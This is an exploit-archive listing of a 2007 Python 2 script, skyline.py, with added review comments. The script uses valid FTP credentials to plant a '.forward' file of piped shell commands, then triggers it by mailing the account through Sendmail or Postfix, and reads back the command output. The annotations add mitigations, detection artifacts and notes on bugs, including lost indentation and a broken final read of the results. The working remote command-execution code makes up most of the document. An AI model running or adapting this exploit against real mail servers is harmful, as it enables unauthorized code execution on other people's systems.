
skyline.py.txt

skyline.py.txt
Posted Dec 14, 2007
Authored by Kingcope

Sendmail/Postfix FORWARD remote exploit that leverages ftpd. Per the script's usage line, it requires a valid FTP username and password for the target account.

tags | exploit, remote
SHA-256 | 6c2d599af10d5698c6da37d9b221e8084949a0ae2fc59f66e062df0039438a0b

skyline.py.txt

#!python
# (C) 2007 kcope production

from ftplib import FTP
import sys
import socket

# Banner and argument handling for the script (Python 2: `print` is used as a statement).
# NOTE(review): leading indentation was lost when this listing was extracted, so the
# lines below are shown flush-left exactly as they appear on the page.
print "Sendmail/Postfix FORWARD Remote Exploit"
print "kcope/2007 - hey alex,andi"

# Exactly three arguments are required: the target host plus an FTP username and
# password. The technique is therefore post-authentication: it depends on valid
# credentials for an account on the target and does not bypass the FTP login.
if (len(sys.argv) != 4):
print "usage: skyline.py <hostname> <ftp username> <ftp password>"
sys.exit()

# Module-level globals read later by FTPconnect() and by the SMTP stage.
hostname = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

print "[+] INITIAL FTP STOR"

# FTPconnect(initial): log in to the FTP service on `hostname` with the supplied
# credentials and upload the local file ".forward" as ".forward" in the FTP login
# directory. When `initial` is true, the local ".forward" is first (re)written with a
# single pipe entry that runs `touch /tmp/XXX`.
#
# NOTE(review): indentation was stripped from this listing, so the exact nesting is
# not recoverable with certainty. The re-open/STOR/quit lines presumably sit outside
# the `if (initial)` branch, because the script later calls FTPconnect(False) and
# still expects an upload - confirm against the original file.
#
# Defender's view: the upload only matters when the FTP login directory is the same
# directory the MTA consults for the account's .forward file (presumably the home
# directory - not shown in this script). Mitigations that break that precondition:
#   - chroot FTP users into a directory that is not their mail home, or deny
#     writes to dotfiles over FTP;
#   - disable program delivery from .forward (Postfix: remove `forward` from
#     `allow_mail_to_commands`; Sendmail: restrict program mailers with smrsh).
def FTPconnect(initial):
try:
ftp = FTP(hostname)
print ftp.getwelcome()
ftp.login(username, password)
if (initial):
# First-stage marker file: a one-line .forward whose entry starts with "|".
f = open(".forward", "wb")
f.write("|touch /tmp/XXX\n")
f.close()
f = open(".forward", "rb")
ftp.storbinary("STOR .forward", f)
ftp.quit()
f.close()
# Bare except: any failure (DNS, connect, login, missing local file, STOR refused)
# is reported with the same message, so the real cause is hidden.
except:
print "[-] FTP Error. Correct Login Credentials ?"
sys.exit()

# Stage 1: upload the marker .forward (the `touch /tmp/XXX` entry).
FTPconnect(True)

print "[+] PLEASE ENTER COMMANDS TO EXECUTE"
print "[+] sendmail allows a single command"
print "[+] postfix allows many"
print "[+] END WITH . IN A SINGLE LINE"

# Read the first command from stdin. NOTE: `input` shadows the Python builtin.
input = sys.stdin.readline().strip()

# Rebuild the local .forward: every line is a pipe entry whose output is redirected
# to ~/RESULTS. The first entry truncates the file (">"), later ones append (">>").
# writelines() is given a single str here; it iterates it character by character,
# which produces the same bytes as write().
f = open(".forward", "wb")
f.writelines("|" + "\"" + input + "> ~/RESULTS" + "\"" + "\n")

# Keep reading commands until a line consisting of "." is entered.
while (True):
input = sys.stdin.readline().strip()
if (input == "."): break
f.writelines("|" + "\"" + input + ">> ~/RESULTS" + "\"" + "\n")

f.close()

# Stage 2: upload the rebuilt .forward.
# Detection note: a .forward in a user's home directory whose lines begin with "|",
# and a file named RESULTS appearing next to it, are the on-disk artifacts of this
# script.
print "[+] FTP STOR"
FTPconnect(False)

print "[+] EXPLOITING BOX"

# First SMTP connection (port 25): read the greeting banner only, then disconnect.
# The mail hostname is sliced out of the banner: characters from index 4 (just past
# a "220 " prefix) up to the next space.
# NOTE(review): find() returns -1 when no space is found, which silently drops the
# last character of the slice instead of failing.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, 25))
smtpline = s.recv(1024)
smtphostname = smtpline[4:smtpline.find(" ", 5)]
s.close()
except:
print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
sys.exit()

# Second SMTP connection: submit an empty message from and to
# <username>@<banner hostname>. Delivering mail to that local account is what makes
# the MTA consult the account's .forward file.
# Server replies are read but never checked, so a rejected RCPT or DATA goes
# unnoticed by the script.
# Detection note: the fixed HELO name "eyecandy", a message whose sender equals its
# recipient with an empty body, and local-delivery log entries that show delivery to
# a command are the server-side traces of this stage.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, 25))
smtpline = s.recv(1024)
print smtpline
s.send("HELO eyecandy\r\n")
s.recv(1024)
s.send("MAIL FROM: " + username + "@" + smtphostname + "\r\n")
s.recv(1024)
s.send("RCPT TO: " + username + "@" + smtphostname + "\r\n")
s.recv(1024)
s.send("DATA" + "\r\n")
s.recv(1024)
s.send("." + "\r\n")
s.recv(1024)
s.send("quit" + "\r\n")
s.recv(1024)
s.close()
except:
print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
sys.exit()

print "[+] RETRIEVING RESULTS"

# Log in over FTP again, print the remote RESULTS file, then delete it.
# retrlines() is called without a callback, so ftplib prints each line to stdout;
# nothing is saved locally.
# Forensics note: only RESULTS is deleted. The uploaded .forward is left in place,
# and no line in this script removes /tmp/XXX from the first stage, so both remain
# as artifacts on the host.
try:
ftp = FTP(hostname)
print ftp.getwelcome()
ftp.login(username, password)
ftp.retrlines("RETR RESULTS")
ftp.delete("RESULTS")
except:
print "[-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / postfix accepting messages ?"
sys.exit()

# NOTE(review): this loop opens a *local* file named "RESULTS", which nothing in the
# script creates (see retrlines above); unless such a file already exists in the
# working directory the open() raises IOError.
for line in open("RESULTS"):
print line

# `f` is the local .forward handle that was already closed after the command loop;
# closing it again is a no-op.
f.close()